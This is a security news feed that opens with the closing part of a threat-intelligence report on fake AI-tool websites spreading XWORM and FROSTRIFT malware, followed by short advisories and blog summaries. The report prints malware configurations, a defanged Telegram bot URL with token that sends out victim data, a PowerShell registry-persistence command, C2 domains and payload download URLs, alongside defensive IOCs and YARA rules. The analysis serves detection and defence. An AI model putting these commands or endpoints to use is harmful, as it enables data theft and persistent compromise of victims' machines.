capabilities include keylogging, command execution, screen capture, and spreading to USB drives. XWORM Configuration The malware begins by decoding its configuration using the AES algorithm. Figure 17: Decryption of configuration Table 6 shows the extracted malware configuration. XWORM Malware Configuration Host artisanaqua[.]ddnsking[.]com Port number 25699 KEY <123456789> SPL Version XWorm V5.2 USBNM USB.exe Telegram Token 8060948661:AAFwePyBCBu9X-gOemLYLlv1owtgo24fcO0 Telegram ChatID -1002475751919 Mutex ZMChdfiKw2dqF51X Table 6: XWORM configuration Host Reconnaissance The malware then performs a system survey to gather the following information: Bot ID Username OS Name If it’s running on USB CPU Name GPU Name Ram Capacity AV Products list Sample of collected information: ☠ [KW-2201] New Clinet : UserName : OSFullName : USB : CPU : GPU : RAM : Groub : This information is sent to a Telegram chat: hxxps[:]//api[.]telegram[.]org:443/bot8060948661:AAFwePyBCBu9X-gOemLYLlv1 owtgo24fcO0/sendMessage?chat_id=-1002475751919&text= Keylogging The malware sample saves the logged keystrokes to the file %temp%\Log.tmp. Sample of content of Log.tmp: ....### explorer ###..[Back] [Back] b a n k [ENTER] C2 Communication The sample connects to its C2 server at tcp://artisanaqua[.]ddnsking[.]com:25699 and initially sends the following information to the C2: "INFOvictim_iduser os_nameXWorm V5.2date_in_dd/mm/yyyy is_sample_name_USB.exe is_administratorhas_webcamcpu_info gpu_inforam_sizeinstalled_AVs" Then the sample waits for any of the following supported commands: Command Description Command Description pong echo back to server StartDDos Spam HTTP requests over TCP to target rec restart bot StopDDos Kill DDOS threads CLOSE shutdown bot StartReport List running processes continuously uninstall self delete StopReport Kill process monitoring threads update uninstall and execute received new version Xchat Send C2 message DW Execute file on disk via powershell Hosts Get hosts file contents FM Execute .NET file in memory Shosts Write to file, likely to overwrite hosts file contents LN Download file from supplied URL and execute on disk DDos Unimplemented Urlopen Perform network request via browser ngrok Unimplemented Urlhide Perform network request in process plugin Load a Bot plugin PCShutdown Shutdown PC now savePlugin Save plugin to registry and load it HKCU\Software\\= PCRestart Restart PC now RemovePlugins Delete all plugins in registry PCLogoff Log off OfflineGet Read Keylog RunShell Execute CMD on shell $Cap Get screen capture Table 7: Supported commands FROSTRIFT Lastly, the launcher executes the file %APPDATA%\ffplay\ffplay.exe to side-load the DLL %APPDATA%\ffplay\libde265.dll and inject FROSTRIFT into a legitimate Windows process. FROSTRIFT is a .NET backdoor that collects system information, installed applications, and crypto wallets. Instead of receiving C2 commands, it receives .NET modules that are stored in the registry to be loaded in-memory. It communicates with the C2 server using GZIP-compressed protobuf messages over TCP/SSL. Malware Configuration The malware starts by decoding its configuration, which is a Base64-encoded and GZIP-compressed protobuf message embedded within the strings table. Figure 18: FROSTRIFT configuration Table 8 shows the extracted malware configuration. Field  Value Protobuf Tag 38 C2 Domain strokes.zapto[.]org C2 Port 56001 SSL Certificate Unknown Default Installation folder APPDATA Mutex 7d9196467986 Table 8: FROSTRIFT configration Persistence FROSTRIFT can achieve persistence by running the command: powershell.exe "Remove-ItemProperty -Path 'HKCU:\SOFTWARE\ Microsoft\Windows\CurrentVersion\Run' -Name ' ';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run' -Name '' -Value '""%APPDATA% \""' -PropertyType 'String'" The sample copies itself to %APPDATA% and adds a new registry value under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the new file path as data to ensure persistence at each system startup. Host Reconnaissance The following information is initially collected and submitted by the malware to the C2: Collected Information Host information Installed Anti-Virus  Web camera  Hostname Username and Role OS name Local time Victim ID HEX digest of the MD5 hash for the following combined: Sample process ID Disk drive serial number Physical memory serial number Victim user name Malware Version 4.1.8 Software Applications com.liberty.jaxx  Foxmail  Telegram Browsers (see Table 10) Standalone Crypto Wallets Atomic, Bitcoin-Qt, Dash-Qt, Electrum, Ethereum, Exodus, Litecoin-Qt, Zcash, Ledger Live Browser Extension Password managers, Authenticators, and Digital wallets (see Table 11) Others 5th entry from the Config (“Default” in this sample) Malware full file path Table 9: Collected information FROSTRIFT checks for the existence of the following browsers: Chromium, Chrome, Brave, Edge, QQBrowser, ChromePlus, Iridium, 7Star, CentBrowser, Chedot, Vivaldi, Kometa, Elements Browser, Epic Privacy Browser, uCozMedia Uran, Sleipnir5, Citrio, Coowon, liebao, QIP Surf, Orbitum, Dragon, Amigo, Torch, Comodo, 360Browser, Maxthon3, K-Melon, Sputnik, Nichrome, CocCoc, Uran, Chromodo, Atom Table 10: List of browsers FROSTRIFT also checks for the existence of 48 browser extensions related to Password managers, Authenticators, and Digital wallets. The full list is provided in Table 11. String Extension ibnejdfjmmkpcnlpebklmnkoeoihofec TronLink nkbihfbeogaeaoehlefnkodbefgpgknn MetaMask fhbohimaelbohpjbbldcngcnapndodjp Binance Chain Wallet ffnbelfdoeiohenkjibnmadjiehjhajb Yoroi cjelfplplebdjjenllpjcblmjkfcffne Jaxx Liberty fihkakfobkmkjojpchpfgcmhfjnmnfpi BitApp Wallet kncchdigobghenbbaddojjnnaogfppfj iWallet aiifbnbfobpmeekipheeijimdpnlpgpp Terra Station ijmpgkjfkbfhoebgogflfebnmejmfbml BitClip blnieiiffboillknjnepogjhkgnoapac EQUAL Wallet amkmjjmmflddogmhpjloimipbofnfjih Wombat jbdaocneiiinmjbjlgalhcelgbejmnid Nifty Wallet afbcbjpbpfadlkmhmclhkeeodmamcflc Math Wallet hpglfhgfnhbgpjdenjgmdgoeiappafln Guarda aeachknmefphepccionboohckonoeemg Coin98 Wallet imloifkgjagghnncjkhggdhalmcnfklk Trezor Password Manager oeljdldpnmdbchonielidgobddffflal EOS Authenticator gaedmjdfmmahhbjefcbgaolhhanlaolb Authy ilgcnhelpchnceeipipijaljkblbcobl GAuth Authenticator bhghoamapcdpbohphigoooaddinpkbai Authenticator mnfifefkajgofkcjkemidiaecocnkjeh TezBox dkdedlpgdmmkkfjabffeganieamfklkm Cyano Wallet aholpfdialjgjfhomihkjbmgjidlcdno Exodus Web3 jiidiaalihmmhddjgbnbgdfflelocpak BitKeep hnfanknocfeofbddgcijnmhnfnkdnaad Coinbase Wallet egjidjbpglichdcondbcbdnbeeppgdph Trust Wallet hmeobnfnfcmdkdcmlblgagmfpfboieaf XDEFI Wallet bfnaelmomeimhlpmgjnjophhpkkoljpa Phantom fcckkdbjnoikooededlapcalpionmalo MOBOX WALLET bocpokimicclpaiekenaeelehdjllofo XDCPay flpiciilemghbmfalicajoolhkkenfel ICONex hfljlochmlccoobkbcgpmkpjagogcgpk Solana Wallet cmndjbecilbocjfkibfbifhngkdmjgog Swash cjmkndjhnagcfbpiemnkdpomccnjblmj Finnie knogkgcdfhhbddcghachkejeap Keplr kpfopkelmapcoipemfendmdcghnegimn Liquality Wallet hgmoaheomcjnaheggkfafnjilfcefbmo Rabet fnjhmkhhmkbjkkabndcnnogagogbneec Ronin Wallet klnaejjgbibmhlephnhpmaofohgkpgkd ZilPay ejbalbakoplchlghecdalmeeeajnimhm MetaMask ghocjofkdpicneaokfekohclmkfmepbp Exodus Web3 heaomjafhiehddpnmncmhhpjaloainkn Trust Wallet hkkpjehhcnhgefhbdcgfkeegglpjchdc Braavos Smart Wallet akoiaibnepcedcplijmiamnaigbepmcb Yoroi djclckkglechooblngghdinmeemkbgci MetaMask acdamagkdfmpkclpoglgnbddngblgibo Guarda Wallet okejhknhopdbemmfefjglkdfdhpfmflg BitKeep mijjdbgpgbflkaooedaemnlciddmamai Waves Keeper Table 11: List of browser extensions C2 Communication  The malware expects the C2 to respond by sending GZIP-compressed Protobuf messages with the following fields: registry_val: A registry value under HKCU\Software\ to store the loader_bytes. loader_bytes: Assembly module to load the loaded_bytes (stored at registry in reverse order). loaded_bytes: GZIP-compressed assembly module to be loaded in-memory. The sample receives loader_bytes only in the first message as it stores it under the registry value HKCU\Software\\registry_val. For the subsequent messages, it only receives registry_val which it uses to fetch loader_bytes from the registry. The sample sends empty GZIP-compressed Protobuf messages as a keep-alive mechanism until the C2 sends another assembly module to be loaded. The malware has the ability to download and execute extra payloads from the following hardcoded URLs (this feature is not enabled in this sample): WebDriver2.exe: hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll; chromedriver2.exe: hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe msedgedriver2.exe: hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe The files are WebDrivers for browsers that can be used for testing, automation, and interacting with the browser. They can also be used by attackers for malicious purposes, such as deploying additional payloads. Conclusion As AI has gained tremendous momentum recently, our research highlights some of the ways in which threat actors have taken advantage of it. Although our investigation was limited in scope, we discovered that well-crafted fake “AI websites” pose a significant threat to both organizations and individual users. These AI tools no longer target just graphic designers; anyone can be lured in by a seemingly harmless ad. The temptation to try the latest AI tool can lead to anyone becoming a victim. We advise users to exercise caution when engaging with AI tools and to verify the legitimacy of the website's domain.  Acknowledgements Special thanks to Stephen Eckels, Muhammad Umair, and Mustafa Nasser for their assistance in analyzing the malware samples. Richmond Liclican for his inputs and attribution. Ervin Ocampo, Swapnil Patil, Muhammad Umer Khan, and Muhammad Hasib Latif for providing the detection opportunities. Detection Opportunities The following indicators of compromise (IOCs) and YARA rules are also available as a collection and rule pack in Google Threat Intelligence (GTI).  Host-Based IOCs File SHA256 Notes Lumalabs_1926326251082123689-626.zip 8863065544df546920ce6189dd3f99ab3f5d644d3d9c440667c1476174ba862b Downloaded ZIP archive Lumalabs_1926326251082123689-626.mp4⠀.exe d3f50dc61d8c2be665a2d3933e2668448edc31546fea84517f8e61237c6d2e5d STARKVEIL C:\winsystem\heif\heif.dll 839260ac321a44da55d4e6a5130c12869066af712f71c558bd42edd56074265b Launcher %APPDATA%\Launcher\libde265.dll  4982a33e0c2858980126b8279191cb4eddd0a35f936cf3eda079526ba7c76959 Persistence %APPDATA%\python\avcodec-61.dll 8d2c9c2b5af31e0e74185a82a816d3d019a0470a7ad8f5c1b40611aa1fd275cc GRIMPULL %APPDATA%\pythonw\heif.dll a0e75bd0b0fa0174566029d0e50875534c2fcc5ba982bd539bdeff506cae32d3 XWORM C:\winsystem\heif-info\heif.dll 1a037da4103e38ff95cb0008a5e38fd6a8e7df5bc8e2d44e496b7a5909ddebeb XWORM %APPDATA%\ffplay\libde265.dll dcb1e9c6b066c2169928ae64e82343a250261f198eb5d091fd7928b69ed135d3 FROSTRIFT C:\winsystem\heif2rgb\heif.dll e663c1ba289d890a74e33c7e99f872c9a7b63e385a6a4af10a856d5226c9a822 FROSTRIFT Network-Based IOCs Malware Command and Control Domain strokes.zapto[.]org:7789 artisanaqua[.]ddnsking[.]com:25699 strokes.zapto[.]org:56001 Fake AI Domains Domain Registration Date creativepro[.]ai 2024-07-10 boostcreatives[.]ai 2024-07-12 creativepro-ai[.]com 2024-08-02 boostcreatives-ai[.]com 2024-08-04 creativespro-ai[.]com 2024-08-07 klingxai[.]com 2024-09-19 lumaai-labs[.]com 2024-09-29 klings-ai[.]com 2024-10-17 luma-dream[.]com 2024-10-26 quirkquestai[.]com 2024-11-02 lumaai-dream[.]com 2024-11-06 lumaai-lab[.]com 2024-11-08 lumaaidream[.]com 2024-11-09 lumaailabs[.]com 2024-11-10 luma-dreamai[.]com 2024-11-12 ai-kling[.]com 2024-11-22 dreamai-luma[.]com 2024-12-13 aikling[.]ai 2025-01-04 aisoraplus[.]com 2025-01-07 lumalabsai[.]in 2025-01-16 canvadream-lab[.]com 2025-01-20 canvadreamlab[.]com 2025-01-25 adobe-express[.]com 2025-02-08 canva-dreamlab[.]com 2025-02-12 canvadreamlab[.]ai 2025-02-14 canvaproai[.]com 2025-02-17 capcutproai[.]com 2025-02-22 luma-aidream[.]com 2025-02-27 luma-dreammachine[.]com 2025-03-07 YARA Rules rule G_Dropper_COILHATCH_1 { meta: author = "Mandiant" strings: $i1 = "zlib.decompress" ascii wide $i2 = "rc4" ascii wide $i3 = "aes_decrypt" ascii wide $i4 = "xor" ascii wide $i5 = "rsa_decrypt" ascii wide $r1 = "private_key" ascii wide $r2 = "runner" ascii wide $r3 = "marshal" ascii wide $r4 = "marshal.loads" ascii wide $r5 = "b85decode" ascii wide $r6 = "exceute_func" ascii wide $r7 = "hybrid_decrypt" ascii wide condition: (4 of ($i*)) and all of ($r*) } rule G_Dropper_STARKVEIL_1 { meta: author = "Mandiant" strings: $p00_0 = { 56 57 53 48 83 EC ?? 48 8D AA [4] 48 8B 7D ?? 48 8B 4F ?? FF 15 [4] 48 89 F9 } $p00_1 = { 0F 0B 66 0F 1F 84 00 [4] 48 89 54 24 ?? 55 41 56 56 57 53 48 83 EC } condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (($p00_0 in (48000 .. 59000) and $p00_1 in (100000 .. 120000))) } import "dotnet" rule G_Downloader_GRIMPULL_1 { meta: author = "Mandiant" strings: $str1 = "SbieDll.dll" ascii wide $str2 = "cuckoomon.dll" ascii wide $str3 = "vmGuestLib.dll" ascii wide $str4 = "select * from Win32_BIOS" ascii wide $str5 = "VMware|VIRTUAL|A M I|Xen" ascii wide $str6 = "Microsoft|VMWare|Virtual" ascii wide $str7 = "win32_process.handle='{0}'" ascii wide $str8 = "stealer" ascii wide $code = { 11 20 11 0F 11 20 11 0F 91 11 1A 11 0F 91 61 D2 9C } condition: dotnet.is_dotnet and all of them } rule G_Backdoor_FROSTRIFT_1 { meta: author = "Mandiant" strings: $guid = "$23e83ead-ecb2-418f-9450-813fb7da66b8" $r1 = "IdentifiableDecryptor.DecryptorStack" $r2 = "$ProtoBuf.Explorers.ExplorerDecryptor" $s1 = "\\User Data\\" wide $s2 = "SELECT * FROM AntiVirusProduct" wide $s3 = "Telegram.exe" wide $s4 = "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')" wide $s5 = "Litecoin-Qt" wide $s6 = "Bitcoin-Qt" wide condition: uint16(0) == 0x5a4d and (all of ($s*) or $guid or all of ($r*)) } YARA-L Rules Mandiant has made the relevant rules available in the Google SecOps Mandiant Intel Emerging Threats curated detections rule set. The activity discussed in the blog post is detected under the rule names: Suspicious Binary File Execution - MP4 Masquerade Suspicious Binary File Execution - Double Extension and Braille Pattern Blank Masquerade Python Script Deobfuscation - Base85 ZLib Marshal Suspicious Staging Directory WinSystem DLL Search Order Hijacking AVCodec61 DLL Search Order Hijacking HEIF DLL Search Order Hijacking Libde265

https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites/
Debian Linux Kernel Multiple Vulnerabilities
2025-05-27T01:00:00Z | 1748307600

Multiple vulnerabilities were identified in Debian Linux Kernel. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege and sensitive information disclosure on the targeted system. Impact Elevation of Privilege Information Disclosure Denial of Service System / Technologies affected Debian bookworm versions prior to 6.1.140-1 Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://lists.debian.org/debian-security-announce/2025/msg00088.html

https://www.hkcert.org/security-bulletin/debian-linux-kernel-multiple-vulnerabilities_20250527
Multiples vulnérabilités dans les produits Mattermost (27 mai 2025)
2025-05-27T00:00:00Z | 1748304000

De multiples vulnérabilités ont été découvertes dans les produits Mattermost. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0453/
Comissão Europeia disponibiliza Base de Dados Europeia de Vulnerabilidades
2025-05-27T00:00:00Z | 1748304000

A Base de Dados Europeia de Vulnerabilidades (EUVD), desenvolvida pela ENISA (Agência da União Europeia para a Cibersegurança), contribui para o reforço da cibersegurança da União Europeia (UE) e está disponível e acessível, de forma pública, a todas as partes interessadas. Visa melhorar a gestão de vulnerabilidades em produtos com componentes digitais, ao promover uma resposta mais coordenada e eficaz às ameaças no domínio da cibersegurança A Base de Dados advém de um requisito da Diretiva NIS 2. Resulta de diversas fontes de informação, nomeadamente do Programa CVE (Common Vulnerabilities and Exposures) gerido pela MITRE Corporation (organização americana sem fins lucrativos). Beneficia de políticas de divulgação coordenada de vulnerabilidades implementadas pelos Estados-Membros da União Europeia, em particular as comunicadas às CSIRT (Computer Security Incident Response Team) da UE, e ainda da identificação de vulnerabilidades em produtos informáticos descobertas por parte destas equipas, conforme previsto pelo enquadramento legislativo da UE. A EUVD pretende ser instrumento para a implementação do Regulamento Ciber-Resiliência (Cyber Resilience Act), ao garantir que produtos com componentes digitais, tais como software e dispositivos, estejam protegidos contra ameaças. Este é mais um passo no sentido de fortalecer a resiliência da UE, ao melhorar a análise e facilitar a correlação de vulnerabilidades, permitindo uma melhor gestão dos riscos de cibersegurança. Mais informações Consulte a base de dados  

https://dyn.cncs.gov.pt/pt/detalhe/art/135933/comissao-europeia-disponibiliza-base-de-dados-europeia-de-vulnerabilidades
Coordinated Cloud-Based Scanning Operation Targets 75 Known Exposure Points in One Day
2025-05-27T00:00:00Z | 1748304000

On May 8, GreyNoise observed a highly coordinated reconnaissance campaign launched by 251 malicious IP addresses, all geolocated to Japan and hosted by Amazon AWS. The infrastructure and execution suggest centralized planning.

https://www.greynoise.io/blog/coordinated-cloud-based-scanning-operation-targets-75-known-exposure-points
Red Hat security advisory (AV25-296)
2025-05-26T19:17:03Z | 1748287023

https://cyber.gc.ca/en/alerts-advisories/red-hat-security-advisory-av25-296
Announcing Graylog 6.3.0-Beta.3
2025-05-26T17:44:41Z | 1748281481

Announcing Graylog 6.3.0-beta.3 Graylog 6.3.0-beta.3 Release date: 2025-05-26 Upgrade notes DEB and RPM packages are available in our repositories Docker Compose Container images: Graylog Open Graylog Enterprise Graylog Data Node Tarballs for manual installation: Graylog Server Graylog Server (bundled JVM, linux-x64) Graylog Server (bundled JVM, linux-aarch64) Graylog Enterprise Server Graylog Enterprise Server (bundled JVM, linux-x64) […] The post Announcing Graylog 6.3.0-Beta.3 appeared first on Graylog.

https://graylog.org/post/announcing-graylog-6-3-0-beta-3/
Safeguarding the “Unprotectable”: Shielding Agentless SCADA and IoT Devices
2025-05-26T17:00:00Z | 1748278800

Industrial control systems, smart-city infrastructure, and remote IoT sensors keep the modern world humming, but most of these devices were never built for today’s threat landscape. They run proprietary firmware, lack the horsepower for agents, and often sit in locations where rolling a truck is impractical. Traditionally they’ve been labeled “unprotectable.”

https://www.threatstop.com/blog/safeguarding-the-unprotectable-shielding-agentless-scada-and-iot-devices
7 Proven Tactics for Preventing Lateral Movement in Enterprise Networks
2025-05-26T15:04:40Z | 1748271880

Learn how to prevent lateral movement in enterprise networks with seven effective strategies—covering segmentation, detection, and response with real examples. The post 7 Proven Tactics for Preventing Lateral Movement in Enterprise Networks appeared first on Fidelis Security.

https://fidelissecurity.com/threatgeek/network-security/preventing-lateral-movement-in-enterprise-network/
CISA Updates Advisory for Active Exploitation Targeting Commvault Metallic SaaS Cloud Platform
2025-05-26T14:49:04Z | 1748270944

Overview The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released an urgent updated advisory highlighting cyber threat activity targeting Commvault’s Metallic Software-as-a-Service (SaaS) platform, which is widely used to back up Microsoft 365 environments. As of May 2025, threat actors reportedly leverage stolen credentials to gain unauthorized access to service principals, prompting serious concerns about cloud supply chain security and elevated privilege abuse across enterprise networks. What Is Commvault Metallic and Why Does It Matter Commvault’s Metallic is a cloud-based backup and recovery service hosted on Microsoft Azure. It allows enterprises to back up Exchange Online, SharePoint, OneDrive, Teams, and other Microsoft 365 data. Because it connects directly to the enterprise Microsoft Entra ID (formerly Azure AD), any compromise in its configuration or credentials can have devastating downstream effects. In this case, attackers may have accessed stored client secrets used by Metallic to authenticate with Microsoft 365 environments. These secrets can act like keys to an organization’s entire cloud infrastructure. Timeline of Activity CISA’s May 22 advisory is an update to a broader investigation into threat actors exploiting default configurations and poorly secured service accounts across multiple cloud platforms. The advisory links the Commvault incident to a growing number of similar supply chain attacks, wherein attackers: Exploit misconfigured cloud applications Abuse of elevated privileges Move laterally across SaaS and identity infrastructures The precise number of affected organizations remains unknown, but the shared nature of SaaS platforms suggests the potential for widespread impact. Key Threat Indicators and Attack Surface According to the advisory, attackers exploited vulnerabilities in storing or managing credentials within the Metallic SaaS platform. They then used these secrets to authenticate against customers' Microsoft Entra ID environments. Affected organizations may observe the following behaviors: Unexpected sign-ins using Commvault service principals Unauthorized modifications to service principal credentials Elevated permissions granted to applications without administrator review Lateral movement into broader M365 environments This pattern suggests a well-orchestrated campaign focused on supply chain exploitation through trusted cloud vendors. Recommended Immediate Actions CISA has outlined a comprehensive set of mitigation steps. Based on Cyble’s threat intelligence and best practices, we strongly encourage organizations to implement the following controls: 1. Audit Service Principal Activity Review Microsoft Entra audit logs for unusual activity involving Commvault-managed identities. Key events to monitor include: Credential updates Sign-ins from suspicious IP ranges Creation of new credentials Consent grants involving high-privilege scopes 2. Enforce Conditional Access For single-tenant applications, restrict authentication to only IP addresses within Commvault’s known allowlisted ranges. This reduces the chance of stolen credentials being used from foreign infrastructure. 3. Rotate Application Secrets Immediately If your organization used Commvault’s Metallic solution before May 2025, assume compromise and rotate credentials. From then on, set policies to auto-rotate secrets every 30 days. 4. Review OAuth and Graph API Permissions Applications often request elevated Graph API scopes, such as Mail.ReadWrite or Files.Read.All. Audit existing app consents and remove those not essential for operations. Ensure admin consent was granted correctly. 5. Implement Secure Cloud Baselines Follow CISA’s Secure Cloud Business Applications (SCuBA) guidance. These baselines help limit excessive privileges, enforce MFA, and reduce lateral movement paths. 6. Enable Unified Audit Logging If not already enabled, turn on Microsoft 365’s unified audit logging to track Exchange, SharePoint, Teams, and Entra activities in a single dashboard. This is critical for long-term forensics. On-Premise Commvault Customers Are Also at Risk Although the focus remains on the Metallic SaaS platform, customers using on-premises Commvault installations are also advised to harden their configurations. Recommendations include: Restricting UI access to trusted internal IPs Deploying a Web Application Firewall (WAF) to block path traversal or malicious uploads Monitoring for unusual activity originating from installation directories Removing any public-facing management portals Applying all available patches from Commvault promptly CVE-2025-3928: A Known Exploited Weakness CISA has added CVE-2025-3928—a vulnerability related to credential storage—to its Known Exploited Vulnerabilities (KEV) catalog. This move requires all federal civilian executive branch agencies to remediate the issue by a specified deadline. Enterprises in regulated sectors such as healthcare, financial services, and energy should treat this as a high-severity incident and act accordingly. Why This Attack Matters to the Broader Ecosystem The Commvault advisory is part of a broader pattern of attacks exploiting the trust boundaries between SaaS providers and identity infrastructures. As organizations increasingly adopt SaaS platforms, their attack surface now includes: Third-party cloud vendors with default configurations Overprivileged service principals Long-lived credentials with no rotation policies OAuth tokens and consent mechanisms Once attackers gain access to a service principal, they can impersonate the application to access customer data, create new users, or exfiltrate sensitive information—all while hiding in legitimate activity logs. This highlights the critical need to treat SaaS security as an extension of your zero-trust strategy. Incident Response and Reporting If your organization suspects compromise: Disconnect suspicious service principals immediately Reset associated credentials Notify internal response teams Report incidents to National CERTs Enterprises are also encouraged to engage with trusted threat intelligence vendors to conduct a broader compromise assessment. Final Thoughts The exploitation of Commvault’s Metallic SaaS platform underlines a dangerous evolution in attacker tactics. Instead of brute-forcing user accounts or exploiting endpoints, threat actors are now targeting trusted service relationships between SaaS platforms and cloud identity providers. Organizations that do not have full visibility into these service relationships—and do not regularly audit and rotate application secrets—may be blind to these threats. As supply chain attacks continue to evolve, so must our defenses. References: https://www.cisa.gov/news-events/alerts/2025/05/22/advisory-update-cyber-threat-activity-targeting-commvaults-saas-cloud-application-metallic The post CISA Updates Advisory for Active Exploitation Targeting Commvault Metallic SaaS Cloud Platform appeared first on Cyble.

https://cyble.com/blog/cisa-updates-alert-commvault-metallic-exploitation/
Mastering Endpoint Threat Hunting: 7 Proven Practices for Uncovering Hidden Attacks
2025-05-26T14:46:00Z | 1748270760

Strengthen your security with proactive endpoint threat hunting—detect stealthy threats early, reduce dwell time, and accelerate response using Fidelis deep session visibility and automated investigation workflows. The post Mastering Endpoint Threat Hunting: 7 Proven Practices for Uncovering Hidden Attacks appeared first on Fidelis Security.

https://fidelissecurity.com/threatgeek/endpoint-security/endpoint-threat-hunting-best-practices/
Huawei ICT Competition 2024–2025: AI Empowers Education and Talent Growth
2025-05-26T14:43:00Z | 1748270580

The Closing & Awards Ceremony of the Huawei ICT Competition 2024–2025 Global Final took place in Shenzhen.

//www.huawei.com/en/news/2025/5/talent-ict
[Control systems] CISA ICS security advisories (AV25–295)
2025-05-26T14:27:16Z | 1748269636

https://cyber.gc.ca/en/alerts-advisories/control-systems-cisa-ics-security-advisories-av25-295
Ubuntu security advisory (AV25-294)
2025-05-26T14:12:32Z | 1748268752

https://cyber.gc.ca/en/alerts-advisories/ubuntu-security-advisory-av25-294
IBM security advisory (AV25-293)
2025-05-26T14:03:34Z | 1748268214

https://cyber.gc.ca/en/alerts-advisories/ibm-security-advisory-av25-293
Vote for the sessions you want to see at TechCrunch Disrupt 2025
2025-05-26T14:00:00Z | 1748268000

We were thrilled by the remarkable interest in speaking at TechCrunch Disrupt 2025, taking place October 27–29 at Moscone West in San Francisco. After an in-depth review process, we’ve selected 20 exceptional finalists — 10 for breakout sessions and 10 for roundtables. Now we’re putting the final decision in your hands. Audience Choice voting is […]

https://techcrunch.com/2025/05/26/vote-for-the-sessions-you-want-to-see-at-techcrunch-disrupt-2025/
Dell security advisory (AV25-292)
2025-05-26T13:52:31Z | 1748267551

https://cyber.gc.ca/en/alerts-advisories/dell-security-advisory-av25-292
GitHub for Beginners: Test-driven development (TDD) with GitHub Copilot
2025-05-26T13:00:00Z | 1748264400

See how to use GitHub Copilot to engage in some test-driven development. The post GitHub for Beginners: Test-driven development (TDD) with GitHub Copilot appeared first on The GitHub Blog.

https://github.blog/ai-and-ml/github-copilot/github-for-beginners-test-driven-development-tdd-with-github-copilot/
ICYMI: A Look Back at Exposure Management Academy Highlights
2025-05-26T13:00:00Z | 1748264400

Each Monday, the Tenable Exposure Management Academy provides the practical, real-world guidance you need to shift from vulnerability management to exposure management. This week, we look back on some highlights from the first couple of months of posts, including the broad view exposure management provides, business impact and getting to a single pane of glass. You can read the entire Exposure Management Academy series here.Since we started the Exposure Management Academy in March, we’ve covered a range of topics with contributions from many of Tenable’s industry experts. In this post, we look at a few of the highlights, focusing on the work of three Tenable thought leaders: information security engineer Arnie Cabral, CSO Robert Huber and CIO Patricia Grant.Exposure management provides a broader viewIf you’re wondering about exposure management, you should pay attention to Arnie Cabral. He’s on the front lines as we move to exposure management internally. Cabral wrote that Tenable’s shift began with a simple realization.“We knew that, although it is critical to modern cybersecurity, vulnerability management alone doesn’t provide a complete picture of cyber risk,” he wrote. He added that traditional vulnerability management involves scanning assets for known vulnerabilities and remediating them based on severity scores. “However, true security risk management requires a broader view that includes misconfigurations, attack surface visibility and real-time threat intelligence,” he wrote. To get going, he reframed existing policies to align with the new approach. This wasn’t just a matter of editing the text, he noted. “Instead, we redefined our objectives and transformed our policies to ensure alignment with emerging risk-based exposure management frameworks,” he wrote.Read all of Arnie’s post: What it Takes to Start the Exposure Management Journey.It’s all about business impactWith a quarter century in cybersecurity, Robert Huber has the perspective it takes to separate the wheat from the chaff when it comes to risk prioritization.Robert believes that, in the shift to exposure management, you need to start with the right data. “One of the big struggles for security professionals is context switching,” he wrote. “When you meet with your business leaders to update them, you often have to scramble to pull together inputs from a dozen different tools and teams.” He added that data is siloed, often incomplete and nearly impossible to compare. He noted that security professionals need to be able to give CEOs and other leaders a clear, coherent picture of the most acute exposures. But they often struggle to obtain an accurate picture.So, when Tenable started moving to exposure management, Huber ensured that the first step was to assimilate the data. “And I mean all of it,” he wrote. “We combed through tools, platforms and teams for every scrap of data.”He added that, until you bring all that data together, you can’t prioritize. Read all of Robert’s post: Turn to Exposure Management to Prioritize Risks Based on Business Impact.Getting to a single pane of glass Tenable CIO Patricia Grant has 30 years of experience leading technology transformation initiatives for both employees and customers.She thinks that securing an enterprise is a responsibility that IT and security share. “While the CSO defines the strategy and risk posture, IT plays a critical role in execution — from patching systems and deploying controls to maintaining uptime and interpreting security signals,” she wrote.As a result, she believes a tight alignment between IT and security is essential. “Ultimately, you can’t do exposure management the right way without a strong relationship between the CIO and the CSO,” she wrote. “We’re both accountable and responsible for protecting our employees, customers, partners and the company. And we both bring something essential to the table.”She added that exposure management helps keep IT and security teams on track — and they gain a unified view across all assets. “I’m not a fan of ‘swivel-chair security,’” she wrote. “I don’t want my team jumping between tools trying to figure out what to fix first. Exposure management moves us toward a single pane of glass.” According to Patricia, it’s easier to understand what needs to be patched now and what can wait. “That kind of visibility is essential when your infrastructure spans everything from data centers and headquarters to home offices and digital nomads working from just about anywhere,” she wrote.Read all of Patricia’s post: Exposure Management Works When the CIO and CSO Are in SyncHave a question about exposure management you’d like us to tackle?We’re all ears. Share your question and maybe we’ll feature it in a future post. MktoForms2.loadForm("//info.tenable.com", "934-XQB-568", 14070);

https://www.tenable.com/blog/icymi-a-look-back-at-exposure-management-academy-highlights
The Power of Connection: Harnessing Customer Experience for Competitive Advantage
2025-05-26T12:30:00Z | 1748262600

An AI-powered, data-driven CX strategy drives loyalty, agility, and growth at scale.

https://news.sap.com/2025/05/connection-harnessing-customer-experience-competitive-advantage/
New SAP SuccessFactors Innovations Help HR Leaders Tackle Uncertainty and Skills Gaps
2025-05-26T12:30:00Z | 1748262600

Today, HR is being asked to make informed and strategic decisions quickly and all employees are expected to work smarter and faster.

https://news.sap.com/2025/05/new-sap-successfactors-innovations-hr-leaders-tackle-uncertainty-skills-gaps/
52% of SOC Teams Are Overworked, New Report Shows
2025-05-26T12:00:00Z | 1748260800

SOCs are overworked and struggling to manage alerts.

https://www.securitymagazine.com/articles/101646-52-of-soc-teams-are-overworked-new-report-shows
DNS Zero-Day Infostealer Detection by Threat Intelligence: Deep Dive
2025-05-26T11:41:18Z | 1748259678

